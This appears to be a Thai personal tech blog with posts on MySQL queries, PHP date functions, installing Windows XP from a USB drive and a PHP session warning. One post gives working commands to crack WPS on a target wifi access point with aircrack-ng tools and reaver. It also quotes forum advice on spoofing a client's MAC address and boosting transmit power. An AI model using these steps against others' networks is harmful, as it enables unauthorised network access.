วันจันทร์ที่ 21 เมษายน พ.ศ. 2557

Mysql เพิ่ม Field การนับจำนวนแถว ขึ้นมาในการแสดงผล

MYSQL ==>

SELECT @i:=@i+1 as idx , `sk_water`.`dates` as dates,
              `sk_water`.`forebay` as forebay,
              sum(`sk_water`.`releases`) as sumrel,
              `sk_water`.`nextday_rel_plan` as nowplan,
              (sum(`sk_water`.`u1_energy`)+
              sum(`sk_water`.`u2_energy`)+
              sum(`sk_water`.`u3_energy`)+
              sum(`sk_water`.`u4_energy`)) as engr
       FROM (SELECT @i:=0) AS _init
       join`sk_water`
       WHERE (year(`sk_water`.`dates`) BETWEEN
     
             (
               SELECT max(year(`sk_water`.`dates`)-1)
               FROM `sk_water`
             ) AND (
               SELECT max(year(`sk_water`.`dates`))
               FROM `sk_water`)
             )
group by datesวันอาทิตย์ที่ 20 เมษายน พ.ศ. 2557

ทำข้อมูลรายชั่วโมงให้แสดงผลเป็นรายเดือน และแปลงตารางจาก Row to Column (Transpose Table)

ทำข้อมูลรายชั่วโมงให้แสดงผลเป็นรายเดือน

Mysql Code => 

SELECT
 year(`sk_water`.`dates`) as years,
  MONTH(`sk_water`.`dates`) as months,
  sum(`sk_water`.`u1_energy` + `sk_water`.`u2_energy`+`sk_water`.`u3_energy`+
  `sk_water`.`u4_energy`) as sumengr
FROM
  `sk_water`
GROUP BY EXTRACT(YEAR_MONTH FROM `sk_water`.`dates`)
order by
year(`sk_water`.`dates`),  MONTH(`sk_water`.`dates`)

Result =>


 ปรับตารางการแสดงผลให้เป็นแบบ Transpose (ปรับจาก Row to Column)

** ก่อนจะทำการปรับตารางได้จะต้องนำ SQL ข้างบนไปทำเป็น รูปแบบ View Table ก่อน
    ตั้งชื่อว่า show_month_year

  จากนั้นใช้คำสั่ง SQL ทำการปรับตาราง
Mysql Code => 
   SELECT show_month_year.years,
          MAX(CASE WHEN show_month_year.`months` = '1' THEN show_month_year.`sumengr` ELSE NULL END) AS Jan,
          MAX(CASE WHEN show_month_year.`months` = '2' THEN show_month_year.`sumengr` ELSE NULL END) AS Feb,
          MAX(CASE WHEN show_month_year.`months` = '3' THEN show_month_year.`sumengr` ELSE NULL END) AS Mar,
          MAX(CASE WHEN show_month_year.`months` = '4' THEN show_month_year.`sumengr` ELSE NULL END) AS Apr,
          MAX(CASE WHEN show_month_year.`months` = '5' THEN show_month_year.`sumengr` ELSE NULL END) AS May,
          MAX(CASE WHEN show_month_year.`months` = '6' THEN show_month_year.`sumengr` ELSE NULL END) AS Jun,          
          MAX(CASE WHEN show_month_year.`months` = '7' THEN show_month_year.`sumengr` ELSE NULL END) AS July,
          MAX(CASE WHEN show_month_year.`months` = '8' THEN show_month_year.`sumengr` ELSE NULL END) AS Aug,
          MAX(CASE WHEN show_month_year.`months` = '9' THEN show_month_year.`sumengr` ELSE NULL END) AS Sep,
          MAX(CASE WHEN show_month_year.`months` = '10' THEN show_month_year.`sumengr` ELSE NULL END) AS Oct,
          MAX(CASE WHEN show_month_year.`months` = '11' THEN show_month_year.`sumengr` ELSE NULL END) AS Nov,
          MAX(CASE WHEN show_month_year.`months` = '12' THEN show_month_year.`sumengr` ELSE NULL END) AS Decs 
    FROM `show_month_year`
    WHERE show_month_year.years BETWEEN '2008' and '2010'
GROUP BY `show_month_year`.`years`

Result =>


วันอาทิตย์ที่ 15 ธันวาคม พ.ศ. 2556

php เพิ่มวัน - เดือน - ปี ในการแสดงผล

บวกวันเพิ่ม
 1. $datedate = date ("Y-m-d", strtotime("+1 day", strtotime($date)));
บวกเดือนเพิ่ม
 1. $datedate = date ("Y-m-d", strtotime("+1 month", strtotime($date)));
บวกปีเพิ่ม
 1. $datedate = date ("Y-m-d", strtotime("+1 year", strtotime($date)));  
<?php
echo date('Y-m-d', strtotime('+1 month'))."";
echo date('Y-m-d',strtotime("now"))."
"
;
echo date('Y-m-d',strtotime("10 September 2000"))."
"
;
echo date('Y-m-d',strtotime("+1 day"))."
"
;
echo date('Y-m-d',strtotime("+1 week"))."
"
;
echo date('Y-m-d',strtotime("+1 week 2 days 4 hours 2 seconds"))."
"
;
echo date('Y-m-d',strtotime("next Thursday"))."
"
;
echo date('Y-m-d',strtotime("last Monday"))."
"
;
echo date("Y-m-d H:i:s", mktime(date("H"), date("i")+0, date("s")+0, date("m")+0 , date("d")+0, date("Y")+0))."
"
;
?>
<?php
echo date('Y-m-d',strtotime('+1 month'))."<br>";
echo date('Y-m-d',strtotime("now"))."<br>";
echo date('Y-m-d',strtotime("10 September 2000"))."<br>";
echo date('Y-m-d',strtotime("+1 day"))."<br>";
echo date('Y-m-d',strtotime("+1 week"))."<br>";
echo date('Y-m-d',strtotime("+1 week 2 days 4 hours 2 seconds"))."<br>";
echo date('Y-m-d',strtotime("next Thursday"))."<br>";
echo date('Y-m-d',strtotime("last Monday"))."<br>";
echo date("Y-m-d H:i:s", mktime(date("H"), date("i")+0, date("s")+0, date("m")+0 , date("d")+0, date("Y")+0))."<br>";
?>

วันพฤหัสบดีที่ 17 ตุลาคม พ.ศ. 2556

Reaver Pro Fix Warning: Failed to associate

1.
enable mon0 
airmon-ng start wlan0

Check for the wps enabled wpa wifi (this can also be done with wifite.py)
#wash -i mon0 -C

set your channel to the same AP in whiich you are interested 
#iwconfig mon0 channel <channel of AP eg. 11>

start aireplay 
#aireplay-ng mon0 -1 120 -a <MAC of AP> -e <AP name>

start reaver 
#reaver -i mon0 -A -b <MAC of AP> -v


2.
Re: reaver "associate" problem
« Reply #9 on: September 28, 2012, 12:50:21 AM »

Some association fixes i've tried that have worked for me:

of course do yer scan
we'll call yer alfa wlan1

airmon-ng start wlan1
airodump-ng mon0
ya do yer scan find yer target etc
from terminal open split window
ctrl+shift+o
click on previous window then
ctrl+c to stop it or space bar to pause
back down to lower window
airodump-ng --bssid (target) -c (whatever channel) mon0
ctrl+shift+o split yer window
aireplay-ng - 1 10 -a (target) mon0
now she's associaten
doesn't mean things are gonna work
but worth a try
now open yet another window in terminal
ctrl+shift+0
reaver -i mon0 -A -b (target) -v
see if ya get wps comen in
if not another idea
when you ran airodump on the target before
if there is a station on that network
copy the mac down of that station
then shut down airmon
airmon-ng wlan1 stop
ifconfig wlan1 down
ifconfig wlan1 hw ether (station mac)
ifconfig wlan1 up
airmon-ng wlan1 start
then do yer aireplay
associate
then run reaver again with the -A in there
so reaver doesn't associate
you can also try boosting the alfa:
before monitor mode:
Boost Alfa:
before monitor mode
iw reg set BO
iwconfig wlan1 txpower 30

might want to try txpower 25 first
check make sure card isn't too warm
after a bit

วันพฤหัสบดีที่ 26 กันยายน พ.ศ. 2556

การติดตั้งWindowด้วยFlashDrive

บทความทางวิชาการ  ll การติดตั้งWindowด้วยFlashDrive

การติดตั้ง Window Xp หรือ Window7 โดยใช้ FlashDrive
         เนื่องจากปัจจุบันเครื่องอ่าน DVD หรือ CDRom Drive มีคุณภาพต่ำอายุการใช้งานน้อยหรือพวก NetBook ที่ไม่มี CDRom Drive ทำให้การติดตั้ง ระบบปฏิบัติการให้เครื่องคอมพิวเตอร์ต้องใช้วิธีอื่น เพื่อหลีกเลี่ยงปัญหาการใช้ Drive DVDหรือ CDRom จึงหลีกเลี่ยงมาติดตั้งผ่านFlashDrive แทนเนื่องจากเมนท์บอร์ดในปัจจุบันสามารถ Boot ด้วย Usb ได้ การติดตั้งจึงมีขั้นตอนดังนี้
สภาพแวดล้อมในการสร้าง FlashDrive Boot ลง window
          
 - นำแผ่น Cd โปรแกรม Window ใส่ใน CdRom Drive รอไว้
 - เสียบตัว FlashDrive ที่จะสร้างในช่อง USB ของเครื่องคอมพิวเตอร์
1. สร้างFlashDrive ที่สามารถบูทระบบได้
2. ก็อปปี้โปรแกรม Window ลง FlashDrive
3. ใช้ FlashDrive Boot ระบบแล้วลง WindowXp หรือ Window7ในการทดลองใช้ Window Xp Servicepack3
วิธีการปฏิบัติทำดังนี้
1. ทำการ Download Program มาไว้ในเครื่องคอมพิวเตอร์ที่จะสร้าง FlashDrive Boot DOWNLOAD>>>>>>
2. แตกไฟร์ที่ Download
3. เข้าไปในโฟลเดอร์ WinSetup-1-0-beta6 เพื่อเลือกคำสั่ง Setup
 

4.เลือกคำสั่ง WinsetupFromUSB-1-0-beta6 เพื่อทำการฟอร์แมท FlashDrive
5. เมื่อสั่ง Setup จะเข้าสู่การ Setup FlashDrive โดยสังเกตจากภาพจะเป็นรุ่นของ FlashDrivem ที่เราเสียบรออยู่ที่เครื่องคอมพิวเตอร์ เสร็จแล้วเลือกที่เมนู RMPrepUSB และสั่ง Go ที่ด้านล่างของหน้าต่างโปรแกรม
 
6. เมื่อสั่ง GO แล้วรอสักครู่จะขึ้นหน้าต่าง RMPREPUSB v.2.0.731 ให้ทำการเลือกการปรับค่าการฟอร์แมทตามรุ่นของ Window ที่จะทำการติดตั้งตามตัวอย่างเลือก Win XP >> FAT32 >>Boot as HDD >> 6 PrepareDrive
 
7. โปรแกรมจะเริ่มฟอร์แมท FlashDrive >> เลือก OK
8. เมื่อเลือก OK จะฟอร์แมททันทีรอสักครู่จนเสร็จ
 
9. เมื่อเสร็จแล้วโปรแกรมจะกลับมาหน้าเก่า RMPREPUSB v.2.0.731 ให้ทำการปิดหน้าต่างนี้
 
10. เมื่อปิดหน้าต่างเก่าแล้วให้กลับไปที่โปรแกรมเริ่มต้นใหม่ เลือกคำสั่ง WinsetupFromUSB-1-0-beta6 เพื่อทำการ
ฟอร์แมท FlashDrive
เลือกwindow xp และ Browse หาแผ่น Window
 
11. เลือกชนิดของ Window ที่เราจะทำการ Copy ลง FlashDrive ในการทดลองนี้ใช้ Window XP Servicepack 3 ซึ่งแผ่นรออยู่ใน Cdrom Drive เรียบร้อยแล้ว เลือกช่อง แรก และไปค้นหาFile ในแผ่นวินโดว์ตามภาพ
 
11.เลือก ไดร์ D ซึ่งเป็นแผ่น CD windowXP
 
12. เลือก GO แล้วรอสักครู่เครื่องคอมพิวเตอร์จะเริ่ม copy ไฟร์ในแผ่นโปรแกรม Window ลง FlashDrive ซึ่งใช้เวลานานพอสมควร
 
13. เมื่อ copy เสร็จ เลือก OK
 
ขั้นตอนการทดลองติดตั้ง Window XP ด้วย FlashDrive
1.       ทำการเซ็ท Bios ให้เครื่องคอมพิวเตอร์บูทด้วย usb โดยเลือกที่เมนู Boot และไปตั้งค่าที่ Hard Disk Drives เป็น USB เป็นลำดับที่ 1  
หมายเหตุ ต้องเสียบ FlashDrive รอไว้ก่อน
 
เลือก USB เป็นไดร์ที่ 1
2.       เมื่อปรับตั้งให้คอมพิวเตอร์บูทด้วย usb เป็นลำดับแรกเสร็จแล้วให้ทำการ Reboot เครื่องใหม่
เครื่องคอมพิวเตอร์จะเริ่มบูทและเข้าสู่การติดตั้งดังภาพให้เลือก Windows XP/2000/2003 setup เสร็จแล้วรอสักครู่จะเข้าสู่ Window Setup
เข้าสู่การติดตั้ง Window
ตัวอย่างไฟร์ที่อยู่ใน FlashDrive หลังจากที่ได้ทำการ Fomat และ Copy เสร็จแล้ว
                                                                 
                             เขียนและทดสอบ    

 สุรศักดิ์ สุนทร       

วันอังคารที่ 6 สิงหาคม พ.ศ. 2556

กรณี PHP Warning: session_register()

 1. กรณี PHP ฟ้อง
  Warning: session_register() [function.session-register]: Cannot send session cache limiter - headers already sent .....

  วิธีการแก้ไข
  - แก้ที่ไฟล์ php.ini  บรรทัด seesion.auto = 1 (ปกติ 0)